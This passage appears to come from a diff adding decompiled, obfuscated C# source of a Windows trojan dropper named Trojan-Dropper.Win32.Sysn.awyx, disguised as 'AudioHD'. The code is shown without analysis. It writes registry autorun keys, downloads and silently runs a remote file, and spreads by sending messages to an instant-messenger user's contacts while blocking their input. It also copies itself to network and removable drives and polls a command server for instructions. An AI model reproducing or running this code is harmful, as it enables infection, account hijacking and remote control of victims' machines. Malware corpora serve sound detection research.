+      {
+      }
+      if (\u000F.\u0001.\u0001.\u0016)
+      {
+        try
+        {
+          Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+          Registry.LocalMachine.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+        }
+        catch
+        {
+        }
+      }
+      else
+      {
+        try
+        {
+          Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3773), true).SetValue(\u000F.\u0001.\u0001.\u0005[0], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[0] + (object) '"'));
+          Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3834), true).SetValue(\u000F.\u0001.\u0001.\u0005[1], (object) ('"'.ToString() + \u000F.\u0001.\u0001.\u0006[1] + (object) '"'));
+        }
+        catch
+        {
+        }
+      }
+      try
+      {
+        this.\u0001.Close();
+        foreach (string str in \u000F.\u0001.\u0001.\u0006)
+          new Process()
+          {
+            StartInfo = {
+              FileName = str,
+              WindowStyle = ProcessWindowStyle.Hidden
+            }
+          }.Start();
+      }
+      catch
+      {
+      }
+      Environment.Exit(0);
+    }
+
+    public void \u000F([In] string obj0)
+    {
+      try
+      {
+        this.\u0001.Close();
+      }
+      catch
+      {
+      }
+      try
+      {
+        string str = \u000F.\u0001.\u0001.\u000F(new Random().Next(5, 12)) + \u0005.\u0001(3210);
+        new WebClient().DownloadFile(obj0, Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str);
+        new Process()
+        {
+          StartInfo = {
+            FileName = (Environment.GetEnvironmentVariable(\u0005.\u0001(3219)) + \u0005.\u0001(1971) + str),
+            WindowStyle = ProcessWindowStyle.Hidden
+          }
+        }.Start();
+      }
+      catch
+      {
+      }
+      Environment.Exit(0);
+    }
+
+    private bool \u000F()
+    {
+      string[] strArray = \u000F.\u0001.\u0001.\u0006;
+      for (int index = 0; index < strArray.Length; index++)
+      {
+        string str = strArray[index];
+        if (!\u000F.\u0001.\u0001.\u0010(str))
+          return false;
+      }
+      return true;
+    }
+
+    private void \u0013()
+    {
+      try
+      {
+        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4000), (object) \u0005.\u0001(1896), RegistryValueKind.DWord);
+      }
+      catch
+      {
+      }
+      if (!\u000F.\u0001.\u0001.\u0015)
+        return;
+      try
+      {
+        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(3919), true).SetValue(\u0005.\u0001(4009), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
+      }
+      catch
+      {
+      }
+      try
+      {
+        Registry.CurrentUser.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
+        Registry.LocalMachine.OpenSubKey(\u0005.\u0001(4034), true).SetValue(\u0005.\u0001(4111), (object) \u0005.\u0001(1936), RegistryValueKind.DWord);
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0005() => \u0003.\u000F();
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0006.cs

@@ -0,0 +1,342 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0003;
+using \u0006;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Runtime.InteropServices;
+using System.Text.RegularExpressions;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace \u000E
+{
+  internal sealed class \u0006
+  {
+    [NonSerialized]
+    internal static \u0001.\u0002 \u0001;
+    public static string[] \u0001;
+    public static string[] \u0002;
+    public static bool \u0001;
+    public static string \u0001;
+
+    [DllImport("user32.dll", EntryPoint = "BlockInput", CharSet = CharSet.Auto)]
+    private static extern bool \u000F([MarshalAs(UnmanagedType.Bool), In] bool fBlockIt);
+
+    [DllImport("user32.dll", EntryPoint = "PostMessage", SetLastError = true)]
+    private static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3);
+
+    [DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)]
+    private static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] IntPtr obj3);
+
+    [DllImport("user32.dll", EntryPoint = "ShowWindow")]
+    private static extern bool \u000F([In] IntPtr obj0, [In] int obj1);
+
+    [DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)]
+    private static extern IntPtr \u000F([In] IntPtr obj0, [In] string obj1);
+
+    public static void \u000F([In] string[] obj0, [In] string[] obj1)
+    {
+      if (\u000E.\u0006.\u0001)
+        return;
+      if (!\u000E.\u0006.\u000F())
+        return;
+      try
+      {
+        \u000E.\u0006.\u0001 = obj0;
+        \u000E.\u0006.\u0002 = obj1;
+        // ISSUE: method pointer
+        ((\u0004.\u0001) new \u0008()).add_OnContactStatusChange(new \u0005((object) null, (UIntPtr) __methodptr(\u000F)));
+        \u000E.\u0006.\u0001 = true;
+      }
+      catch
+      {
+      }
+    }
+
+    private static void \u000F([In] object obj0, [In] \u0002.\u0007 obj1)
+    {
+      \u0003.\u0006 vContact = (\u0003.\u0006) obj0;
+      if (obj1 != \u0002.\u0007.\u0003 || vContact.IsSelf || \u000E.\u0006.\u000F(vContact.SigninName) || vContact.Blocked)
+        return;
+      if (\u000E.\u0006.\u0010(vContact.SigninName))
+        return;
+      try
+      {
+        \u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
+        string str1 = \u000E.\u0006.\u000F(vContact.FriendlyName);
+        foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
+        {
+          IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
+          try
+          {
+            \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
+          }
+          catch
+          {
+          }
+        }
+        foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
+        {
+          IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
+          try
+          {
+            \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
+          }
+          catch
+          {
+          }
+        }
+        \u000E.\u0006.\u000F(true);
+        Thread.Sleep(1000);
+        ((\u0003.\u0004) obj).\u0002((object) vContact);
+        IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, vContact.FriendlyName + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
+        if (num1.ToString() == \u000E.\u0006.\u0001(1939))
+          num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
+        \u000E.\u0006.\u000F(num1, 0);
+        \u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
+        string str2 = \u000E.\u0006.\u0001[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0001.Length)];
+        string newValue = \u000E.\u0006.\u0002[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0002.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName);
+        SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
+        SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
+        Process[] processes = Process.GetProcesses();
+        for (int index = 0; index < processes.Length; ++index)
+        {
+          try
+          {
+            if (processes[index].MainWindowTitle.Contains(vContact.SigninName))
+              processes[index].CloseMainWindow();
+          }
+          catch
+          {
+          }
+        }
+        \u000E.\u0006.\u000F(false);
+      }
+      catch
+      {
+        \u000E.\u0006.\u000F(false);
+      }
+    }
+
+    private static bool \u000F([In] string obj0) => new List<string>()
+    {
+      \u000E.\u0006.\u0001(4244),
+      \u000E.\u0006.\u0001(4277),
+      \u000E.\u0006.\u0001(4306),
+      \u000E.\u0006.\u0001(4339),
+      \u000E.\u0006.\u0001(4368),
+      \u000E.\u0006.\u0001(4397),
+      \u000E.\u0006.\u0001(4426),
+      \u000E.\u0006.\u0001(4451),
+      \u000E.\u0006.\u0001(4484),
+      \u000E.\u0006.\u0001(4517),
+      \u000E.\u0006.\u0001(4554),
+      \u000E.\u0006.\u0001(4595),
+      \u000E.\u0006.\u0001(4620),
+      \u000E.\u0006.\u0001(4653),
+      \u000E.\u0006.\u0001(4686),
+      \u000E.\u0006.\u0001(4731),
+      \u000E.\u0006.\u0001(4768),
+      \u000E.\u0006.\u0001(4801),
+      \u000E.\u0006.\u0001(4838),
+      \u000E.\u0006.\u0001(4867),
+      \u000E.\u0006.\u0001(4900),
+      \u000E.\u0006.\u0001(4929),
+      \u000E.\u0006.\u0001(4958),
+      \u000E.\u0006.\u0001(4995),
+      \u000E.\u0006.\u0001(5032),
+      \u000E.\u0006.\u0001(5065),
+      \u000E.\u0006.\u0001(5094),
+      \u000E.\u0006.\u0001(5135),
+      \u000E.\u0006.\u0001(5168),
+      \u000E.\u0006.\u0001(5032),
+      \u000E.\u0006.\u0001(5201),
+      \u000E.\u0006.\u0001(5242),
+      \u000E.\u0006.\u0001(5283),
+      \u000E.\u0006.\u0001(5316),
+      \u000E.\u0006.\u0001(5337),
+      \u000E.\u0006.\u0001(5358),
+      \u000E.\u0006.\u0001(5383),
+      \u000E.\u0006.\u0001(5420),
+      \u000E.\u0006.\u0001(5453),
+      \u000E.\u0006.\u0001(5478),
+      \u000E.\u0006.\u0001(5507),
+      \u000E.\u0006.\u0001(5544),
+      \u000E.\u0006.\u0001(5573),
+      \u000E.\u0006.\u0001(5606),
+      \u000E.\u0006.\u0001(5639),
+      \u000E.\u0006.\u0001(5680),
+      \u000E.\u0006.\u0001(5705),
+      \u000E.\u0006.\u0001(5742),
+      \u000E.\u0006.\u0001(5775),
+      \u000E.\u0006.\u0001(5420),
+      \u000E.\u0006.\u0001(5804),
+      \u000E.\u0006.\u0001(5837),
+      \u000E.\u0006.\u0001(5862),
+      \u000E.\u0006.\u0001(5891),
+      \u000E.\u0006.\u0001(5928),
+      \u000E.\u0006.\u0001(5961),
+      \u000E.\u0006.\u0001(5994),
+      \u000E.\u0006.\u0001(6027),
+      \u000E.\u0006.\u0001(6072)
+    }.Contains(obj0);
+
+    private static bool \u0010([In] string obj0)
+    {
+      foreach (string str in new List<string>()
+      {
+        \u000E.\u0006.\u0001(6117),
+        \u000E.\u0006.\u0001(6126),
+        \u000E.\u0006.\u0001(6135),
+        \u000E.\u0006.\u0001(6156),
+        \u000E.\u0006.\u0001(6177),
+        \u000E.\u0006.\u0001(6198),
+        \u000E.\u0006.\u0001(6219),
+        \u000E.\u0006.\u0001(6244),
+        \u000E.\u0006.\u0001(6265),
+        \u000E.\u0006.\u0001(6286),
+        \u000E.\u0006.\u0001(6307),
+        \u000E.\u0006.\u0001(6328),
+        \u000E.\u0006.\u0001(6345),
+        \u000E.\u0006.\u0001(6362),
+        \u000E.\u0006.\u0001(6379),
+        \u000E.\u0006.\u0001(6396),
+        \u000E.\u0006.\u0001(6244),
+        \u000E.\u0006.\u0001(6265),
+        \u000E.\u0006.\u0001(6286),
+        \u000E.\u0006.\u0001(6328),
+        \u000E.\u0006.\u0001(6345),
+        \u000E.\u0006.\u0001(6345),
+        \u000E.\u0006.\u0001(6362),
+        \u000E.\u0006.\u0001(6417),
+        \u000E.\u0006.\u0001(6434),
+        \u000E.\u0006.\u0001(6459),
+        \u000E.\u0006.\u0001(6476),
+        \u000E.\u0006.\u0001(6521),
+        \u000E.\u0006.\u0001(6550),
+        \u000E.\u0006.\u0001(6571),
+        \u000E.\u0006.\u0001(6596),
+        \u000E.\u0006.\u0001(6621),
+        \u000E.\u0006.\u0001(6646),
+        \u000E.\u0006.\u0001(6667),
+        \u000E.\u0006.\u0001(6680),
+        \u000E.\u0006.\u0001(6689),
+        \u000E.\u0006.\u0001(6706),
+        \u000E.\u0006.\u0001(6727)
+      })
+      {
+        if (obj0.EndsWith(str))
+          return true;
+      }
+      return false;
+    }
+
+    private static string \u000F([In] string obj0)
+    {
+      string pattern = \u000E.\u0006.\u0001(6740);
+      return Regex.Replace(obj0, pattern, string.Empty);
+    }
+
+    public static void \u000F([In] string[] obj0, [In] string[] obj1, [In] int obj2)
+    {
+      if (!\u000E.\u0006.\u000F())
+        return;
+      try
+      {
+        \u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
+        ((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0004;
+        foreach (\u0003.\u0006 myContact1 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
+        {
+          if (myContact1.Status != \u0002.\u0007.\u0002 && !myContact1.IsSelf && !\u000E.\u0006.\u000F(myContact1.SigninName) && !myContact1.Blocked)
+          {
+            if (!\u000E.\u0006.\u0010(myContact1.SigninName))
+            {
+              try
+              {
+                string str1 = \u000E.\u0006.\u000F(myContact1.FriendlyName);
+                foreach (\u0003.\u0006 myContact2 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
+                {
+                  IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact2.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact2.SigninName + \u000E.\u0006.\u0001(1879));
+                  try
+                  {
+                    \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
+                  }
+                  catch
+                  {
+                  }
+                }
+                foreach (\u0003.\u0006 myContact3 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
+                {
+                  IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact3.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact3.SigninName + \u000E.\u0006.\u0001(1879));
+                  try
+                  {
+                    \u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
+                  }
+                  catch
+                  {
+                  }
+                }
+                \u000E.\u0006.\u000F(true);
+                Thread.Sleep(1000);
+                ((\u0003.\u0004) obj).\u0002((object) myContact1);
+                IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, myContact1.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
+                if (num1.ToString() == \u000E.\u0006.\u0001(1939))
+                  num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
+                \u000E.\u0006.\u000F(num1, 0);
+                \u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
+                string str2 = obj0[\u000E.\u0006.\u000F(0, obj0.Length)];
+                string newValue = obj1[\u000E.\u0006.\u000F(0, obj1.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName);
+                SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
+                SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
+                Process[] processes = Process.GetProcesses();
+                for (int index = 0; index < processes.Length; ++index)
+                {
+                  try
+                  {
+                    if (processes[index].MainWindowTitle.Contains(myContact1.SigninName))
+                      processes[index].CloseMainWindow();
+                  }
+                  catch
+                  {
+                  }
+                }
+                \u000E.\u0006.\u000F(false);
+                Thread.Sleep(obj2);
+              }
+              catch
+              {
+                \u000E.\u0006.\u000F(false);
+              }
+            }
+          }
+        }
+        ((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0003;
+      }
+      catch
+      {
+        \u000E.\u0006.\u000F(false);
+      }
+      \u000E.\u0006.\u000F(false);
+    }
+
+    private static int \u000F([In] int obj0, [In] int obj1) => new Random().Next(obj0, obj1);
+
+    public static bool \u000F() => File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u000E.\u0006.\u0001(6753));
+
+    static \u0006()
+    {
+      \u0001.\u0003.\u000F();
+      \u000E.\u0006.\u0001 = (string[]) null;
+      \u000E.\u0006.\u0002 = (string[]) null;
+      \u000E.\u0006.\u0001 = false;
+      \u000E.\u0006.\u0001 = \u000E.\u0006.\u0001(1001);
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0007.cs

@@ -0,0 +1,112 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u000E;
+using Microsoft.Win32;
+using System;
+using System.Diagnostics;
+using System.IO;
+using System.Management;
+using System.Threading;
+
+namespace \u000E
+{
+  internal sealed class \u0007
+  {
+    [NonSerialized]
+    internal static \u0002 \u0001;
+    private static \u0008 \u0001;
+    private string \u0001 = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
+
+    public static void \u000F() => new \u0007().\u0010();
+
+    public void \u0010()
+    {
+      try
+      {
+        foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0007.\u0001(6807)).Get())
+        {
+          Thread.Sleep(50);
+          string str = Convert.ToString(managementObject[\u0007.\u0001(6844)]);
+          if (!str.Contains(\u0007.\u0001(1724)))
+            File.Copy(this.\u0001, \u0007.\u0001(6853) + Environment.MachineName + \u0007.\u0001(1979) + str + \u0007.\u0001(6858), true);
+        }
+      }
+      catch (Exception ex)
+      {
+        \u0007.\u0001.\u0010(ex.ToString());
+      }
+      try
+      {
+        string name = \u0007.\u0001(6887);
+        RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name);
+        foreach (string valueName in registryKey.GetValueNames())
+        {
+          Thread.Sleep(50);
+          string str = registryKey.GetValue(valueName).ToString();
+          if (valueName.ToLower() != \u0007.\u0001(6988))
+          {
+            try
+            {
+              File.Copy(this.\u0001, str + \u0007.\u0001(7001), true);
+            }
+            catch (Exception ex)
+            {
+            }
+          }
+        }
+        registryKey.Close();
+      }
+      catch (Exception ex)
+      {
+        \u0007.\u0001.\u0010(ex.ToString());
+      }
+    }
+
+    public static void \u0011()
+    {
+      if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030)))
+        return;
+      StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030));
+      streamWriter.WriteLine(\u0007.\u0001(7043));
+      streamWriter.WriteLine(\u0007.\u0001(7072));
+      streamWriter.WriteLine(\u0007.\u0001(7097));
+      streamWriter.WriteLine(\u0007.\u0001(7138));
+      streamWriter.WriteLine(\u0007.\u0001(7203));
+      streamWriter.WriteLine(\u0007.\u0001(7272));
+      streamWriter.WriteLine(\u0007.\u0001(7345));
+      streamWriter.WriteLine(\u0007.\u0001(7414));
+      streamWriter.WriteLine(\u0007.\u0001(7483));
+      streamWriter.WriteLine(\u0007.\u0001(7556));
+      streamWriter.WriteLine(\u0007.\u0001(7625));
+      streamWriter.WriteLine(\u0007.\u0001(7702));
+      streamWriter.WriteLine(\u0007.\u0001(7779));
+      streamWriter.WriteLine(\u0007.\u0001(1784));
+      streamWriter.Close();
+      new Process()
+      {
+        StartInfo = {
+          WindowStyle = ProcessWindowStyle.Hidden,
+          FileName = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030))
+        }
+      }.Start();
+      try
+      {
+        File.Delete(Path.Combine(Directory.GetCurrentDirectory(), \u0007.\u0001(7856)));
+      }
+      catch
+      {
+      }
+    }
+
+    static \u0007()
+    {
+      \u0003.\u000F();
+      \u0007.\u0001 = new \u0008();
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000E/_0008.cs

@@ -0,0 +1,149 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0001;
+using \u0008;
+using \u000E;
+using System;
+using System.IO;
+using System.Net;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+
+namespace \u000E
+{
+  internal sealed class \u0008 : \u0003
+  {
+    [NonSerialized]
+    internal new static \u0002 \u0001;
+    public static \u000E.\u0001 \u0001;
+
+    public void \u000F()
+    {
+      this.\u0010();
+      // ISSUE: method pointer
+      new Thread(new ThreadStart((object) this, __methodptr(\u0011))).Start();
+    }
+
+    public void \u000F([In] int obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7872) + \u000F.\u0001.\u0001.\u0007.ToString() + \u000E.\u0008.\u0001(7889) + (object) obj0);
+
+    public void \u000F([In] string obj0, [In] string obj1) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7894) + obj0 + \u000E.\u0008.\u0001(7907) + obj1 + \u000E.\u0008.\u0001(7912) + \u000E.\u0008.\u0001.\u000E.ToString());
+
+    public void \u0010([In] string obj0) => this.\u000F(\u000F.\u0001.\u0001.\u0006, \u000E.\u0008.\u0001(7921) + \u000E.\u0008.\u0001.\u000E.ToString() + \u000E.\u0008.\u0001(7938) + obj0.ToString());
+
+    private void \u0010()
+    {
+      string str = \u000E.\u0008.\u0001(7947) + \u000F.\u0001.\u0001.\u0007 + \u000E.\u0008.\u0001(7964) + \u000F.\u0001.\u0001.\u000E + \u000E.\u0008.\u0001(7977) + \u000F.\u0001.\u0001.\u0005 + \u000E.\u0008.\u0001(7990) + \u000F.\u0001.\u0001.\u0008;
+      while (true)
+      {
+        try
+        {
+          this.\u000F(\u000F.\u0001.\u0001.\u0006, str);
+          break;
+        }
+        catch
+        {
+        }
+        Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
+      }
+    }
+
+    private void \u0011()
+    {
+      string str1 = \u000E.\u0008.\u0001(7999) + \u000F.\u0001.\u0001.\u0007;
+      while (true)
+      {
+        try
+        {
+          string str2 = this.\u000F(\u000F.\u0001.\u0001.\u0006, str1);
+          if (str2.Length > 0)
+          {
+            int num = 0;
+            try
+            {
+              foreach (char ch in str2)
+              {
+                if (ch.ToString() == \u000E.\u0008.\u0001(1797))
+                  ++num;
+              }
+            }
+            catch
+            {
+            }
+            for (int index = 0; index < num; ++index)
+            {
+              try
+              {
+                this.\u000F(str2.Split('~')[index].Replace(\u000E.\u0008.\u0001(1797), \u000E.\u0008.\u0001(1009)));
+              }
+              catch
+              {
+              }
+            }
+          }
+          else
+          {
+            try
+            {
+              \u0007.\u0008.\u0010();
+            }
+            catch
+            {
+            }
+            try
+            {
+              \u0002.\u0010();
+            }
+            catch
+            {
+            }
+            try
+            {
+              \u000F.\u0007.\u0010();
+            }
+            catch
+            {
+            }
+            try
+            {
+              \u0003.\u0010();
+            }
+            catch
+            {
+            }
+          }
+        }
+        catch
+        {
+        }
+        Thread.Sleep(\u000F.\u0001.\u0001.\u0001 * 1000);
+      }
+    }
+
+    private string \u000F([In] string obj0, [In] string obj1)
+    {
+      ServicePointManager.Expect100Continue = false;
+      HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(obj0);
+      httpWebRequest.ContentType = \u000E.\u0008.\u0001(8016);
+      httpWebRequest.Method = \u000E.\u0008.\u0001(8061);
+      httpWebRequest.UserAgent = \u000F.\u0001.\u0001.\u0004;
+      byte[] bytes = Encoding.Default.GetBytes(obj1);
+      httpWebRequest.ContentLength = (long) bytes.Length;
+      Stream requestStream = httpWebRequest.GetRequestStream();
+      requestStream.Write(bytes, 0, bytes.Length);
+      requestStream.Close();
+      WebResponse response = httpWebRequest.GetResponse();
+      return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
+    }
+
+    static \u0008()
+    {
+      \u0003.\u000F();
+      \u000E.\u0008.\u0001 = new \u000E.\u0001();
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/Token200007C.cs

@@ -0,0 +1,12 @@
+// Decompiled with JetBrains decompiler
+// Type: .Token200007C
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+namespace \u000F
+{
+  internal class Token200007C : \u0024Unresolved\u0024Token\u003A2003FFF
+  {
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0001.cs

@@ -0,0 +1,46 @@
+// Decompiled with JetBrains decompiler
+// Type: .

+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
+
+using \u0008;
+using \u000E;
+using \u000F;
+using System;
+using System.Threading;
+
+namespace \u000F
+{
+  internal static class \u0001
+  {
+    public static \u0001 \u0001 = new \u0001();
+    public static \u0008.\u0008 \u0001 = new \u0008.\u0008();
+    public static \u0006 \u0001 = new \u0006();
+    public static \u0005 \u0001 = new \u0005();
+    private static \u0001 \u0001 = new \u0001();
+    private static \u000E.\u0008 \u0001 = new \u000E.\u0008();
+
+    [STAThread]
+    private static void \u000F()
+    {
+      try
+      {
+        \u0001.\u0001.\u000F();
+        \u0001.\u0001.\u0007 = \u0001.\u0001.\u0010();
+        \u0001.\u0001.\u0008 = \u0001.\u0001.\u000F();
+        \u0001.\u0001.\u0016 = \u0001.\u0001.\u000F();
+        \u0001.\u0001.\u000F();
+        \u0001.\u0001.\u000F();
+        \u0001.\u0001.\u000F();
+        new Thread(new ThreadStart(\u0004.\u000F)).Start();
+        new Thread(new ThreadStart(\u0007.\u0007.\u000F)).Start();
+        \u0003.\u000F();
+      }
+      catch
+      {
+        Environment.Exit(0);
+      }
+    }
+  }
+}

MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0002.cs

@@ -0,0 +1,113 @@
+// Decompiled with JetBrains decompiler
+// Type: .
+// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
